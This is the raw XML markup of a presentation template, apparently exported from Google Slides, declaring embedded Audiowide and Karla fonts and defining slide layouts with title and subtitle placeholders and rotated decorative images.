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Audiowide"/>
      <p:regular r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Karla"/>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Karla-regular.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Audiowide-regular.fntdata"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Karla-italic.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Karla-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Karla-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c4b8509a1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c4b8509a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c4b8509a13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c4b8509a13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c4b8509a1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c4b8509a1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f4ac53a11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f4ac53a11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c4b8509a13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c4b8509a13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c4b8509a1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c4b8509a1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c4b8509a13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2c4b8509a13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c4b8509a13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2c4b8509a13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f4ac53a11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f4ac53a11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f4ac53a11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1f4ac53a11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c4b8509a13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2c4b8509a13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c4b8509a1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c4b8509a1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f4ac53a11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f4ac53a11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c4b8509a13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2c4b8509a13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c4b8509a13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2c4b8509a13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f4ac53a11a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1f4ac53a11a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f4ac53a11a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1f4ac53a11a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1f4ac53a11a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1f4ac53a11a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2c4b8509a13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2c4b8509a13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1f4ac53a11a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1f4ac53a11a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2c4b8509a13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2c4b8509a13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2c4b8509a13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2c4b8509a13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c4b8509a13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c4b8509a13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2c4b8509a13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2c4b8509a13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2c4b8509a13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2c4b8509a13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1f4ac53a11a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1f4ac53a11a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1f4ac53a11a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1f4ac53a11a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2c4b8509a1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2c4b8509a1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2c4b8509a1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2c4b8509a1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c4b8509a13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c4b8509a13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c4b8509a1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c4b8509a1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c4b8509a13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c4b8509a13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c4b8509a13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c4b8509a13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c4b8509a13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c4b8509a13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c4b8509a13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c4b8509a13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 Id="rId6"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10" name="Google Shape;10;p2"/>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txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625850" y="1317528"/>
            <a:ext cx="5892300" cy="2358300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="4500">
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowid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4" name="Google Shape;14;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625850" y="3778500"/>
            <a:ext cx="5892300" cy="473700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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15" name="Google Shape;15;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1011050" y="-447675"/>
            <a:ext cx="5892301" cy="3648150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Google Shape;16;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4261050" y="1962150"/>
            <a:ext cx="5892301" cy="36481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6" name="Shape 86"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87" name="Google Shape;87;p11"/>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88" name="Google Shape;88;p11"/>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1"/>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1"/>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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="186">
            <a:off x="977225" y="1686338"/>
            <a:ext cx="5538000" cy="12342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9600"/>
              <a:buNone/>
              <a:defRPr sz="8100"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buNone/>
              <a:defRPr sz="9600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buNone/>
              <a:defRPr sz="9600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buNone/>
              <a:defRPr sz="9600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buNone/>
              <a:defRPr sz="9600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buNone/>
              <a:defRPr sz="9600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buNone/>
              <a:defRPr sz="9600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buNone/>
              <a:defRPr sz="9600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buNone/>
              <a:defRPr sz="9600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Google Shape;92;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977225" y="2821638"/>
            <a:ext cx="5538000" cy="45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800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="93" name="Google Shape;93;p11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="6015032">
            <a:off x="3802652" y="445901"/>
            <a:ext cx="7113000" cy="4404125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="94" name="Google Shape;94;p11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="-60" r="0" t="537"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-5399997">
            <a:off x="-1590800" y="1404054"/>
            <a:ext cx="5772273" cy="3552819"/>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95" name="Shape 9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1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="96" name="Shape 96"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="97" name="Google Shape;97;p13"/>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98" name="Google Shape;98;p13"/>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3"/>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txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713224" y="1835250"/>
            <a:ext cx="23055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2" name="Google Shape;102;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713224" y="2269375"/>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3" name="Google Shape;103;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713224" y="3680488"/>
            <a:ext cx="2305500" cy="5277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4" name="Google Shape;104;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713224" y="4114613"/>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5" name="Google Shape;105;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419251" y="3680488"/>
            <a:ext cx="2305500" cy="5277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6" name="Google Shape;106;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419251" y="4114613"/>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7" name="Google Shape;107;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419251" y="1835250"/>
            <a:ext cx="23055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8" name="Google Shape;108;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419251" y="2269375"/>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9" name="Google Shape;109;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="8" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1415374" y="1344775"/>
            <a:ext cx="901200" cy="44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0" name="Google Shape;110;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="9" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4121401" y="3190025"/>
            <a:ext cx="901200" cy="44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1" name="Google Shape;111;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="13" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1415374" y="3190025"/>
            <a:ext cx="901200" cy="44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2" name="Google Shape;112;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="14" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4121401" y="1344775"/>
            <a:ext cx="901200" cy="44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3" name="Google Shape;113;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="15" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125276" y="3680488"/>
            <a:ext cx="2305500" cy="5277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4" name="Google Shape;114;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="16" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125276" y="4114613"/>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5" name="Google Shape;115;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="17" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125276" y="1835250"/>
            <a:ext cx="23055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6" name="Google Shape;116;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="18" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6125276" y="2269375"/>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7" name="Google Shape;117;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="19" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6827426" y="3190025"/>
            <a:ext cx="901200" cy="44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8" name="Google Shape;118;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="20" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6827426" y="1344775"/>
            <a:ext cx="901200" cy="44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pic>
        <p:nvPicPr>
          <p:cNvPr id="119" name="Google Shape;119;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-1377750" y="2269750"/>
            <a:ext cx="4857272" cy="3007325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="120" name="Google Shape;120;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5366340" y="82974"/>
            <a:ext cx="5095572" cy="3154876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="21" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="122" name="Shape 122"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="123" name="Google Shape;123;p14"/>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124" name="Google Shape;124;p14"/>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4"/>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4"/>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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1486024" y="3068248"/>
            <a:ext cx="6172200" cy="446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500"/>
              <a:buNone/>
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Google Shape;128;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485800" y="1628863"/>
            <a:ext cx="6172200" cy="1498200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="2500">
                <a:solidFill>
